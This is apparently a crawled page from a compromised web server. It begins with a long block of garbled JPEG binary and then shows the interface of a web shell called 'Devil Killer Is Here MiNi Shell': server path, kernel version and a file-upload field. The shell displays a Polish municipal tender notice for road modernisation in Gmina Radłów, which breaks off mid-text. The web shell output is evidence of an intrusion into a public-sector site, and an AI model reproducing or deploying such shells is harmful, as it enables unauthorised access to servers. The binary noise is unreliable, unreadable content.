JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220316/0008767301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja dróg na terenie Gminy Radłów w miejscowościach: Biskupice Radłowskie, Marcinkowice, Przybysławice, Radłów, Siedlec, Wał Ruda, Zabawa </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Radłów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660915</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radłów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminaradlow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminaradlow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja dróg na terenie Gminy Radłów w miejscowościach: Biskupice Radłowskie, Marcinkowice, Przybysławice, Radłów, Siedlec, Wał Ruda, Zabawa </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4faa8427-a50f-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00087673</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033672/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja dróg na terenie Gminy Radłów w miejscowościach: Biskupice Radłowskie, Marcinkowice, Przybysławice, Radłów, Siedlec, Wał Ruda, Zabawa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/umradlow,m,402582,2022.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.miniportal.uzp.gov.pl,sekretariat@gminaradlow.pl,<br/>inwestycje@gminaradlow.pl,tgdowski@gminaradlow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu:<br/>a) formularzy do komunikacji dostępnych na miniPortalu, (https://miniportal.uzp.gov.pl/), które<br/>przekierowują do ePUAP-u (https://epuap.gov.pl/wps/portal) oraz<br/>b) poczty elektronicznej - sekretariat@gminaradlow.pl.<br/>2) Zamawiający ponadto przewiduje komunikację pomiędzy Zamawiającym a Wykonawcą za pomocą<br/>poczty elektronicznej:<br/>a) Andrzej Janicki – e-mail: inwestycje@gminaradlow.pl – sprawy merytoryczne oraz sprawy związane<br/>z przedmiotem zamówienia,<br/>b) Tomasz Gdowski – e-mail: tgdowski@gminaradlow.pl – sprawy formalne, proceduralne<br/>3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”.<br/>4) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania<br/>z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji<br/>publicznej (ePUAP).<br/>5) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku”<br/>i „Formularza do komunikacji” wynosi 150 MB.<br/>6) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.<br/>7) Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej<br/>SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu<br/>klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>8) Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym w ogólnie dostępnych formatach danych, w<br/>szczególności<br/>w formatach .txt, .rtf, .pdf, .doc, .docx, .odt..<br/>9) Wykonawcy w korespondencji kierowanej do Zamawiającego powinni posługiwać się numerem przedmiotowego postępowania (znakiem sprawy).<br/>W zakresie nie wymienionym powyżej zastosowanie mają zapisy SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a) Zamawiający oświadcza, że spełnia wymogi określone w<br/>rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez<br/>wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.b) Dane<br/>osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. „Modernizacja dróg na terenie Gminy Radłów w miejscowościach: Biskupice Radłowskie, Marcinkowice, Przybysławice, Radłów, Siedlec, Wał Ruda, Zabawa” .c)<br/>Odbiorcami przekazanych przez wykonawcę danych<br/>osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania<br/>zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do<br/>informacji publicznej.d) Dane osobowe wykonawcy zawarte w protokole postępowania będą<br/>przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. e)<br/>Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się Informacji nt. RODO -<br/>załącznik nr 9 do SWZ.f) Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w<br/>celu innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane<br/>osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w lit. b<br/>powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym<br/>innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2<br/>RODO.g) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do<br/>wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z<br/>udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:-<br/>obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane<br/>osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu<br/>w treści oferty lub dokumentów składanych na żądanie zamawiającego;- obowiązek informacyjny<br/>wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów<br/>składanych na żądanie zamawiającego.h) W celu zapewnienia, że wykonawca wypełnił ww. obowiązki<br/>informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały<br/>przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu<br/>przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść<br/>oświadczenia została zawarta w załączniku nr 9 do SWZ. i) Sposób postępowania z danymi osobowymi, w tym ich udostępnianie itd.<br/>opisany został w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PPI.271.10.22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest modernizacja dróg na terenie Gminy Radłów w miejscowościach: Biskupice Radłowskie, Marcinkowice, Przybysławice, Radłów, Siedlec, Wał Ruda, Zabawa. <br/>2)	W skład przedmiotu zamówienia wchodzi realizacja następujących zadań:<br/><br/><br/>1.	Modernizacja drogi gminnej nr 200167K Radłów - Polna dz. nr 1868,1878/1,1878/16 w km 0+000 -0+680	Radłów – ul. Polna	<br/>2.	Modernizacja drogi gminnej nr 200168K Radłów - Polna dz. nr 1878/11; 1881/11; 1878/1 w km od 0+000 do km 0+290	Radłów - ul. Polna (zapętlenie)	<br/>3.	Modernizacja drogi gminnej nr 200169K Radłów - Morawa dz. nr 1737/1 w km 0+000 - 0+400	Radłów ul. Morawa	<br/>4.	Modernizacja drogi gminnej nr 200184K Radłów - Grobla dz. nr 1190/1 w km 0+000 - 0+500	Radłów - ul. Grobla	<br/>5.	Modernizacja drogi gminnej nr 200179K Radłów - Przelotowa dz. nr 429, 682 w km 0+000 - 0+578	Radłów - ul. Przelotowa	<br/>6.	Modernizacja drogi gminnej nr 200145K Siedlec - Sklep dz. nr ewid. 145 w Siedlcu w km 0+000 - 0+350	Siedlec	<br/>7.	Modernizacja drogi gminnej nr 200146K Siedlec - do Krzyża dz. nr 1 w km od 0+000 do km 0+315	Siedlec - Do Krzyża	<br/>8.	Modernizacja drogi gminnej nr 200131K Przybysławice - Kościół dz. nr 1938 w km 0+000 - 0+180	Przybysławice - Kościół	<br/>9.	Modernizacja drogi gminnej nr 200137K Przybysławice - Za Szkołą dz. nr 2140, 2353 w km 0+000 - 0+388	Przybysławice – za Szkołą	<br/>10.	Modernizacja drogi gminnej nr 200128K Marcinkowice - Przybysławice dz. nr 1275 w km 0+890 do km 1+390; w km od 1+627 do km 1+702	Marcinkowice-Przybysławice	<br/>11.	Modernizacja drogi gminnej nr 200120K Zabawa - Zdarzec dz. nr ewid. 1404, 1405 w Zabawie w km 0+600 - 1+400	Zabawa - Zdarzec	<br/>12.	Modernizacja drogi gminnej nr 200119K Zabawa - GS Zabawa dz. nr 1145 w km 0+000 - 0+110	Zabawa - GS Zabawa	<br/>13.	Modernizacja drogi gminnej nr 200118K Zabawa - GS Zabawa dz. nr 1156/1; 1156/2 w km 0+000-0+510	Zabawa - GS Zabawa	<br/>14.	Modernizacja drogi gminnej nr 200116K Zabawa - Błonie -Zdarzec dz. nr 658/2, w km 0+000-0+975	Zabawa - Błonie - Zdarzec	<br/>15.	Modernizacja drogi gminnej Zabawa ul. Spokojna dz. nr 681 w km od 0+000 do km 0+227	Zabawa - ul. Spokojna	<br/>16.	Modernizacja drogi gminnej nr 200192K Wał - Ruda – Bór (pod siecią) dz. nr 1244/1, 1244/2 w km 0+000 - 0+445	Wał - Ruda Bór pod siecią	<br/>17.	Modernizacja drogi gminnej nr 200162K Biskupice Radłowskie - Kościelna dz. nr 836 w km 0+000 - 0+055; dz. nr 235 w km od 0+120 do km 0+505	Biskupice Radłowskie – ul. Kościelna<br/>18.	Modernizacja drogi gminnej nr 200161K Biskupice Radłowskie -Kościelna dz. nr 513,512/9 w km 0+620-1+270	Biskupice Radłowskie- ul. Kościelna	<br/>19.	Modernizacja drogi gminnej nr 200159K Biskupice Radłowskie - Nowa nr dz.749/2 w km 0+000 - 0+980	Biskupice Radłowskie - ul. Nowa	<br/>20.	Modernizacja drogi gminnej nr 200152K Biskupice Radłowskie - Witosa dz. nr 795, 884 w km od 0+000 do km 0+350	Biskupice Radłowskie - ul. Witosa	<br/>21.	Modernizacja drogi gminnej nr K200178K Radłów - ul. Leśna dz. nr 1958 w km od 0+242 do km 0+735	Radłów - ul. Leśna	<br/>22	Modernizacja drogi gminnej nr K200178K Radłów - ul. Leśna dz. nr 1958 w km od 0+000 do km 0+242 – ciąg pieszo-jezdny	Radłów - ul. Leśna	<br/>23.	Modernizacja drogi gminnej nr K200174 w Radłowie - ul. Dąbrowskiego (dz.ew. nr 987) w km 0+000 - 0+595 – ciągi pieszo jezdne ciąg pieszo-jezdny	Radłów - ul. Dąbrowskiego	<br/>24.	Modernizacja drogi gminnej nr K 200182 w Radłowie ul. Zakościele dz.nr 169 w km 0+070 - 0+900 – ciąg pieszo-jezdny	Radłów - ul. Zakościele	<br/>25.	Modernizacja drogi gminnej nr K 200165 w miejscowości Biskupice Radłowskie ul. Boh. Września nr dz. 903/7 km 0+000 - 0+097 ciąg pieszo-jezdny	Biskupice Radłowskie - ul. Bohaterów Września	0,097<br/>	<br/>3)	Przedmiot zamówienia obejmuje realizację następującego zakresu robót i obowiązków:<br/>a)	wyrównanie istniejącej nawierzchni mieszanką bitumiczną,<br/>b)	wykonanie warstwy ścieralnej – 4 cm,<br/>c)	miejscowe wzmocnienie podbudowy,<br/>d)	regulacja krawędzi jezdni,<br/>e)	utwardzenie poboczy dróg kruszywem wraz z powierzchniowym utrwaleniem,<br/>f)	przebudowa dróg wraz z budową ciągów pieszych- jezdnych – (Radłów ul. Leśna, Dąbrowskiego, Zakościele oraz Biskupice Radłowskie ul. Bohaterów Września),<br/>4)	Szczegółowy opis i zakres przedmiotu zamówienia w ramach zadania określają: <br/>	Dokumentacja Projektowa – Załącznik nr 6 do SWZ.<br/> STWiORB – Załącznik nr 5 do SWZ,<br/>	Przedmiary robót (będący częścią Dokumentacji projektowej) – Załącznik nr 4 do SWZ. <br/>	Projektowane postanowienia umowy – Załącznik nr 7 do SWZ. <br/>6)	W projektowanych postanowieniach umownych przyjęto zasadę wynagrodzenia ryczałtowego, tak więc wchodzący w skład Dokumentacji projektowej Przedmiar robót ma również na celu umożliwienie dokonania wyceny poszczególnych elementów robót. <br/>7) Zamawiający oczekuje od Wykonawcy podania ceny za realizację zamówienia, jako ceny ryczałtowej, która obejmuje wykonanie wszystkich elementów zamówienia będących przedmiotem rysunku i tekstu załączników do SWZ, łącznie z podatkiem VAT obowiązującym w dniu złożenia oferty. <br/>8)	Zamawiający żąda przed podpisaniem umowy z wybranym Wykonawcą, złożenia przez niego uproszczonego Kosztorysu ofertowego, dla każdego zadania oddzielnie, sporządzonego w oparciu o Dokumentację Projektową, STWiORB oraz ewentualną wizję lokalną przeprowadzoną przez Wykonawcę. <br/>9) Wykonawca wykona roboty budowlane w oparciu o dokumentację projektową, zgodnie z warunkami wykonania i odbioru robót określonymi w STWiORB, <br/>z należytą starannością, zgodnie z aktualnie obowiązującymi przepisami, normami technicznymi, standardami, zasadami sztuki budowlanej, etyką zawodową oraz warunkami określonymi w dokumentach zamówienia.<br/>10)	Do wykonania robót Wykonawca użyje wyłącznie materiałów własnych, posiadających wymagane atesty i certyfikaty, które będą wymagane przy odbiorze końcowym robót. Przy doborze materiałów należy kierować się wymaganiami sprecyzowanymi w dokumentacji technicznej oraz specyfikacji technicznej wykonania i odbioru robót. <br/>11)	W czasie realizacji robót Wykonawca będzie usuwał i składował wszelkie urządzenia pomocnicze we własnym zakresie i na własny koszt.<br/>12)	Wszelkie inne koszty realizacji przedmiotu zamówienia (koszty mediów – energia elektryczna, woda, opłaty, i inne), konieczne do poniesienia w celu prawidłowego wykonania zamówienia, do momentu jego bezusterkowego, protokolarnego przyjęcia przez Zamawiającego poniesie Wykonawca. <br/>13)	Wykonawca zapewni do kierowania robotami osoby z uprawnieniami w specjalnościach niezbędnych do prawidłowego wykonania powierzonego zadania, w szczególności instalacyjnej w zakresie sieci, instalacji i urządzeń i będzie w okresie realizacji prowadził dziennik budowy (jeżeli takowy będzie konieczny) we współpracy z Inspektorem Nadzoru ustanowionym przez Zamawiającego. <br/>14)	Należy zachować szczególną ostrożność i zminimalizować uciążliwości związane z prowadzonymi pracami gdyż Wykonawca ponosił będzie pełną odpowiedzialność za szkody oraz następstwa nieszczęśliwych wypadków pracowników i osób trzecich, a powstałych w związku z prowadzonymi robotami budowlanymi w okresie od daty protokolarnego przejęcia terenu budowy przez Wykonawcę do daty końcowego odbioru robót. <br/>15)	Wykonawca jest odpowiedzialny za staranne zapoznanie się z dokumentami zamówienia.<br/>16)	Wszystkie wymagania określone w dokumentach zamówienia stanowią wymagania minimalne i ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>17)	Gwarancja i rękojmia<br/>	Wymagany okres gwarancji na wykonany przedmiot umowy – minimum 36 miesięcy. <br/>	Wymagany okres rękojmi na wykonany przedmiot umowy – minimum 36 miesięcy.<br/><br/>Ostateczny termin gwarancji jakości oraz rękojmi zostanie określony w ofercie Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1. Cena 60 punktów<br/>2.	Okres gwarancji jakości 40 punktów<br/>	Razem	100 punktów<br/><br/>2)	Sposób dokonywania oceny:<br/>a)	Sposób oceny ofert w kryterium cena:<br/>Pc = (Cbn /Cb) x 60 punktów<br/><br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/><br/>b)	Sposób oceny ofert w kryterium okres gwarancji jakości (Pg):<br/>•	Zaoferowanie 36 miesięcy gwarancji – 0 pkt. <br/>•	Zaoferowanie 42 miesięcy gwarancji – 10 pkt. <br/>•	Zaoferowanie 48 miesięcy gwarancji – 20 pkt. <br/>•	Zaoferowanie 54 miesięcy gwarancji – 30 pkt. <br/>•	Zaoferowanie 60 miesięcy gwarancji – 40 pkt. <br/><br/>Zamawiający informuje, iż za najdłuższy realny okres gwarancji jakości przyjmuje okres 60 miesięcy. <br/>Minimalny natomiast wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy. <br/> <br/>c)	Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pg, gdzie:<br/><br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium cena <br/>Pg - liczba punktów uzyskanych w kryterium okres gwarancji.<br/><br/>3)	Obliczenia 